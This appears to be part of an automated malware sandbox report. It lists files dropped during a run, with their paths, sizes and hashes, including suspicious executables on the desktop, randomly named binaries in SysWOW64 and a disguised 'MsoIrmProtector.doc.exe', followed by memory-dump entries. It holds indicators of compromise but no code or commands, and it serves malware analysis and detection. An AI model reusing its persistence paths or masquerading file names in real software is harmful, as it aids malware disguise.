SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uq1dqbaz.vn0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.datFilesize
209B
MD5b1cefafb03065339e24eed313a0fac7f
SHA1a5dc7d197c29dcef1c5aa03d901b5bd8d5bbb42d
SHA256a49f061a098c0f192f2bf918cd7c54e6c4223c96ba3846afa429e7d16a8e8317
SHA512f731e7b2046d0158610e291f2ef86c0f86b22b809fb1dc635aa55446579ba1a6ca2f9636d64d48556494e05bac7749011f4e84330c82da5bcfcea7e9867c4415
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msFilesize
3KB
MD5e5a29f87aa40a2623ec095d813204916
SHA14c1c5d0de8381677b408944a4da0d2e12f117671
SHA256074aea1e5f35f6222e30b9cd1c71f07379b8909e1ffcc2dd2cec814402c0cb82
SHA5123b1d7012c4f8f93fb0fcc6b69c92c74d52531b9bfb97817f25af5278c5a2e55428e7411adb232d8a6611c8ffab6d282d74def00d592c2914b4f734aaae4812b0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RFe58561a.TMPFilesize
3KB
MD5060a8922d34c3b8c02c654a9534b5253
SHA19a867a5684469cbe6a383f26a5c2d28e240215b5
SHA25628b198a82d266cb2333906b0f21dd9433a4892486b2a6d79fc0a289560036cfe
SHA5122f269fbd5d86507f32233257c73ec8a890e0c74dc04aa5ac0f5293c981873ddcac7beba97e3ec98ded3567623064ed2512153602783edf5a32111a404ff68c97
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\Rover.exeFilesize
5.1MB
MD563d052b547c66ac7678685d9f3308884
SHA1a6e42e6a86e3ff9fec137c52b1086ee140a7b242
SHA2568634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba
SHA512565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\ac3.exeFilesize
844KB
MD57ecfc8cd7455dd9998f7dad88f2a8a9d
SHA11751d9389adb1e7187afa4938a3559e58739dce6
SHA2562e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\helper.vbsFilesize
26B
MD57a97744bc621cf22890e2aebd10fd5c8
SHA11147c8df448fe73da6aa6c396c5c53457df87620
SHA256153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709
SHA51289c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\jaffa.exeFilesize
512KB
MD56b1b6c081780047b333e1e9fb8e473b6
SHA18c31629bd4a4ee29b7ec1e1487fed087f5e4b1de
SHA256e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac
SHA512022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\loader.exeFilesize
5KB
MD53a66b8c04d1437b4c4da631053a76bb5
SHA1bcf8f381932d376f3f8e53c82b2b13ff31ee097b
SHA256c3aa0c8ff9e3c7e10bcd3829f3e63b4cf9c59eb4964a7576f3ef5fca50c77cdc
SHA512b24f3fb34aa293293d4f7bef247ca746608cb9ae54d214492276e7ef0fe0032944ea082f2bbf42f200359d38ed2af69f51ef5f3cb969a0ffb7176b27e0279fcf
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\main.cmdFilesize
867B
MD54eab82459d6247d5cb735bc6883a0b1f
SHA1d4e1ee562a1594b0f6a01134d9acdb36021bf8f8
SHA2564545d060ce8984205a5e1a136a523cb34c7a5df5427aeabc94bc2693b8773b2f
SHA512de3ae9666d4c681ee05a7ae7fc2c5c84e204044dc29553db2377dd3e25694ae8b5739bb56bcfa80ccc19dfff147e1b095505e092bac8ec9bcbb324988e69dc59
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\scary.exeFilesize
3.1MB
MD597cd39b10b06129cb419a72e1a1827b0
SHA1d05b2d7cfdf8b12746ffc7a59be36634852390bd
SHA2566bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc
SHA512266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\spinner.gifFilesize
44KB
MD5324f8384507560259aaa182eb0c7f94a
SHA13b86304767e541ddb32fdda2e9996d8dbeca16ed
SHA256f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5
SHA512cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\temp.batFilesize
16B
MD5683678b879bd775b775240fcb1cd495e
SHA110bc596b3d03e1ba328068305c8acee2745c731c
SHA25664f28aef02c7fafbc9d80735a8b1d607c3996a2ddf9ba260d4c433c002efeaba
SHA5123b2b9d231643a826183732a79489c6d2f4749ce25314c444364062c781627af59b572c082d811ae57a839cae94de77cf03eb81d99e1063e2191e884ccbaa0963
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\the.exeFilesize
764KB
MD5e45dcabc64578b3cf27c5338f26862f1
SHA11c376ec14025cabe24672620dcb941684fbd42b3
SHA256b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455
SHA5125d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\web.htmFilesize
176B
MD51fab717c517da1c27e82a93edddf9390
SHA124b6cfda27c15c1d01ba5718106c18687ed77397
SHA256bd035700f060a35c394600cabf0cf04c031927786c97cf41c55d78dddeffa11c
SHA5125452938fa310396ecacae8eab64bdae624f617e19c0d742e10e088befb686c205b8db9ccec7d9de1c9360f341db8a701d5b8c6c4eb20aaa1c2deb831ab09fab5
-
C:\Windows\SysWOW64\shilkiszkvwxo.exeFilesize
512KB
MD5a72a8412d48dd951ed4eea6342634b6e
SHA1b039f7c0d7c98962c6fac3c0e364d16c82674f08
SHA256faaaac426c66d7bac032131fcc07a3f8690e0b6c61b243e7a04f808ecdf9e707
SHA512faaf185965ae5db73f4c82a6668d341cb5840e99e6129eb1b5c4f7971befda7f995663cef097ceacfce2fdce55fcc809b50e977c2dd96a5dc1dbbca4fdaba4a6
-
C:\Windows\SysWOW64\vbsnimmo.exeFilesize
512KB
MD5380def9e0d4e350086ae0138a4de12b4
SHA148a979c836f90d23e47e975814a9c4cba299e7ab
SHA2566ed0e68b4a65d154a6929f424357c77617a12bc5eff175738988a5c39fa1d9eb
SHA5124b1ce74309e87409373ecc34816715188e551631f7d3a031c745a3554e377574c3d3c27cba9eb80eb29cb30e987e9abebcdb52f2171d35f4051ebf96f942104b
-
C:\Windows\SysWOW64\whkszztakb.exeFilesize
512KB
MD5dcaad54897c519dfd60fd3f2171702df
SHA130fca38b8f3fb4ee93a95d4ce0a4f3e89fa379be
SHA256fd451eea0ccec849810015a3de50199c3d5e9f6a6d560be8cf230fa0c3a8e6a0
SHA5128214e6d496911df79fc6d1375a49af0d73bc821a62a4668e243ebd7b2b2e2ccbc59354e5c7ed5e66bd673f362b4b317a2e402f74b2f860cadf86c8a8d71ea0ce
-
C:\Windows\SysWOW64\ztmpxseewjrualr.exeFilesize
512KB
MD5cbc74942693baae47ff8f7d036f43d24
SHA1838f1073befd55383340c288582bdc4680c190e5
SHA2563a98474611d5543cce7a53b626467d840bcbabda6690550ea9397d532e8b72ec
SHA512217a7cd759199ea58ecf0d21a3ca9d895b2fa9c56874d6ea88aee07a9546d880593a3d2df45bc49447bcc77a513eaf26280d92a0f69a081727915c52740f3ec7
-
C:\Windows\mydoc.rtfFilesize
223B
MD506604e5941c126e2e7be02c5cd9f62ec
SHA14eb9fdf8ff4e1e539236002bd363b82c8f8930e1
SHA25685f2405d1f67021a3206faa26f6887932fea71aea070df3efb2902902e2d03e2
SHA512803f5f2fddbf29fef34de184eb35c2311b7a694740983ca10b54ef252dd26cda4987458d2569f441c6dedc3478bea12b45bfd3566f1b256504a0869ad3829df7
-
\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exeFilesize
512KB
MD5569b0eb5e57412da60a1db9007c902f7
SHA12c45b09fa9b74be6cca0898b5aec693558095a63
SHA256f0514a92b095bd43d1e08c5f32a096d5de0d44db895cdc9ea0354d9b894a6949
SHA5127a02a10a938cce12e3d3a5f23ba8bca12b0e432037059a4b779513c2b64969709c6008a9b70435e70d50b0bb190579ebfac83555f21ac72106234994bbe0423c
-
\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exeFilesize
512KB
MD519d567f4f5df9b3b0d75285e28caedc5
SHA1eb9b93697d8ed35e70d80a689019ff710cd1e5b0
SHA256710e40aee4e88a495d9d189e1e92f3660330737b058f0e22c9bdd3dd5e390bfc
SHA5126c1a46afa4bc0869545f3b8add0917d21fe8204c4245f004a95ce1839415f91102ec393d7daafd01f7013f7776500ab8c569963c31abb7d07dba8c2773a4c691
-
\??\pipe\LOCAL\crashpad_4584_UFVNFJTCUNYYRMWKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1156-62-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-111-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-78-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-74-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-72-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-67-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-68-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-82-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-64-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-88-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-51-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-49-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-44-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-91-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-43-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-93-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-95-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-97-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-99-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-101-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-39-0x0000000005F20000-0x0000000006470000-memory.dmpFilesize
5.3MB
-
memory/1156-40-0x0000000006A20000-0x0000000006F6E000-memory.dmpFilesize
5.3MB
-
memory/1156-47-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-58-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-60-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-105-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-80-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-113-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-3044-0x0000000005DD0000-0x0000000005E62000-memory.dmpFilesize
584KB
-
memory/1156-3048-0x0000000005EC0000-0x0000000005ECA000-memory.dmpFilesize
40KB
-
memory/1156-3055-0x000000000B950000-0x000000000C030000-memory.dmpFilesize
6.9MB
-
memory/1156-109-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-71-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-108-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-76-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-84-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-86-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/1156-103-0x0000000006A20000-0x0000000006F69000-memory.dmpFilesize
5.3MB
-
memory/2160-3075-0x00000228A1F20000-0x00000228A1F42000-memory.dmpFilesize
136KB
-
memory/3572-2-0x00000000054C0000-0x00000000054E4000-memory.dmpFilesize
144KB
-
memory/3572-3081-0x000000007523E000-0x000000007523F000-memory.dmpFilesize
4KB
-
memory/3572-3085-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3572-3-0x0000000075230000-0x00000000759E1000-memory.dmpFilesize
7.7MB
-
memory/3572-1-0x0000000000A00000-0x0000000000A8C000-memory.dmpFilesize
560KB
-
memory/3572-0-0x000000007523E000-0x000000007523F000-memory.dmpFilesize
4KB
-
memory/3572-4-0x0000000005AC0000-0x0000000006066000-memory.dmpFilesize
5.6MB
-
memory/3772-31-0x00007FFEE6790000-0x00007FFEE7131000-memory.dmpFilesize
9.6MB
-
memory/3772-28-0x00007FFEE6790000-0x00007FFEE7131000-memory.dmpFilesize
9.6MB
-
memory/3772-26-0x00007FFEE6A45000-0x00007FFEE6A46000-memory.dmpFilesize
4KB
-
memory/3772-3086-0x00007FFEE6790000-0x00007FFEE7131000-memory.dmpFilesize
9.6MB
-
memory/5348-2333-0x0000000000DB0000-0x00000000010D4000-memory.dmpFilesize
3.1MB
